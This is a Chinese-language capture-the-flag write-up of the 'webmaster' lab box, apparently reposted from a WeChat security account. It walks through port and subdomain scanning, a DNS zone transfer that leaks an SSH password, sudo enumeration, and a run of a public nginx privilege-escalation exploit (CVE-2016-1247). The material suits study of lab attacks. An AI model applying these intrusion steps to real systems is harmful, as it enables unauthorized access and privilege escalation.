【OSCP】webmaster

admin
admin
admin
140350
文章
117
评论
2024年8月12日20:55:48评论24 views字数 5630阅读18分46秒阅读模式

【OSCP】webmaster

OSCP 靶场

【OSCP】webmaster

靶场介绍

webmaster

easy

DNS服务利用、sudo-nginx 提权

信息收集

主机发现

nmap -sn 192.168.1.0/24

【OSCP】webmaster

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.131
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 03:29 EST
Nmap scan report for 192.168.1.131
Host is up (0.00058s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6d:7e:d2:d5:d0:45:36:d7:c9:ed:3e:1d:5c:86:fb:e4 (RSA)
|   256 04:9d:9a:de:af:31:33:1c:7c:24:4a:97:38:76:f5:f7 (ECDSA)
|_  256 b0:8c:ed:ea:13:0f:03:2a:f3:60:8a:c3:ba:68:4a:be (ED25519)
53/tcp open  domain  (unknown banner: not currently available)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|_    currently available
| dns-nsid: 
|_  bind.version: not currently available
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.94%I=7%D=2/18%Time=65D1C00A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,52,"�P�x06x85��x01�x01�x01��x07versionx
SF:04bind��x10�x03xc0x0c�x10�x03�����x18x17notx20curren
SF:tlyx20availablexc0x0c�x02�x03�����x02xc0x0c");
MAC Address: 08:00:27:3F:B8:3D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

添加dns,扫描目录

【OSCP】webmaster

【OSCP】webmaster

┌──(root㉿kali)-[~]
└─# vim /etc/hosts

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://webmaster.hmv -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://webmaster.hmv
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://webmaster.hmv/index.html (Status: 200) [Size: 57]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

子域名扫描

┌──(root㉿kali)-[~]
└─# wfuzz -u 'http://webmaster.hmv' -H 'Host: FUZZ.webmaster.hmv' -t 100 -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt      --hh 57
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 /usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning:urllib3 (1.25.8) or chardet (5.0.0)/charset_normalizer (2.0.7) doesn't match a supported version!
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://webmaster.hmv/
Total requests: 114441

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

Total time: 0
Processed Requests: 114441
Filtered Requests: 114441
Requests/sec.: 0

探测DNS服务

┌──(root㉿kali)-[~]
└─# dig axfr @192.168.1.131 webmaster.hmv

; <<>> DiG 9.18.16-1-Debian <<>> axfr @192.168.1.131 webmaster.hmv
; (1 server found)
;; global options: +cmd
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
webmaster.hmv. 604800 IN NS ns1.webmaster.hmv.
ftp.webmaster.hmv. 604800 IN CNAME www.webmaster.hmv.
john.webmaster.hmv. 604800 IN TXT "Myhiddenpazzword"
mail.webmaster.hmv. 604800 IN A 192.168.0.12
ns1.webmaster.hmv. 604800 IN A 127.0.0.1
www.webmaster.hmv. 604800 IN A 192.168.0.11
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
;; Query time: 0 msec
;; SERVER: 192.168.1.131#53(192.168.1.131) (TCP)
;; WHEN: Sun Feb 18 03:49:51 EST 2024
;; XFR size: 8 records (messages 1, bytes 274)

权限获取

尝试使用dns 探测的字符串进行ssh 登录,成功获取权限

【OSCP】webmaster

【OSCP】webmaster

权限提升

john@webmaster:/home$ sudo -l
Matching Defaults entries for john on webmaster:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User john may run the following commands on webmaster:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx

尝试使用nginx 本地提权漏洞exp

【OSCP】webmaster

【OSCP】webmaster

john@webmaster:/var/www/html$  find / -name error.log 2>/dev/null
/var/log/nginx/error.log
john@webmaster:/var/www/html$ cd /tmp
john@webmaster:/tmp$ ls
40768.sh  systemd-private-1c3a990ff89c4c06871c36a7516e4680-systemd-timesyncd.service-CJcxvG
john@webmaster:/tmp$ ./40768.sh /var/log/nginx/error.log 
 _______________________________
< Is your server (N)jinxed ? ;o >
 -------------------------------
                                 __---__
                    _-       /--______
               __--( /      )XXXXXXXXXXXv.
             .-XXX(   O   O  )XXXXXXXXXXXXXXX-
            /XXX(       U     )        XXXXXXX          /XXXXX(              )--_  XXXXXXXXXXX         /XXXXX/ (      O     )   XXXXXX   XXXXX         XXXXX/   /            XXXXXX   __ XXXXX
         XXXXXX__/          XXXXXX         __---->
 ---___  XXX__/          XXXXXX      __         /
   -  --__/   ___/  XXXXXX            /  ___--/=
    -    ___/    XXXXXX              '--- XXXXXX
       -/XXX XXXXXX                      /XXXXX
         XXXXXXXXX                       /XXXXX/
          XXXXXX      >                 _/XXXXX/
            XXXXX--__/              __-- XXXX/
             -XXXXXXXX---------------  XXXXXX-
                XXXXXXXXXXXXXXXXXXXXXXXXXX/
                  ""VXXXXXXXXXXXXXXXXXXV""

Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247)
nginxed-root.sh (ver. 1.0)

Discovered and coded by:

Dawid Golunski
https://legalhackers.com

[+] Starting the exploit as:
uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

[!] You need to execute the exploit as www-data user! Exiting.

因为需要www-data 用户执行该脚本,所以我们还需要获取www-data 权限

参考链接:https://icepng.github.io/2017/05/15/CVE-2016-1247/

本来想写入webshell 获取www-data 权限再执行脚本的,写入后发现直接是root 权限了。

【OSCP】webmaster

原文始发于微信公众号(贝雷帽SEC):【OSCP】webmaster

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月12日20:55:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】webmasterhttp://cn-sec.com/archives/3057021.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息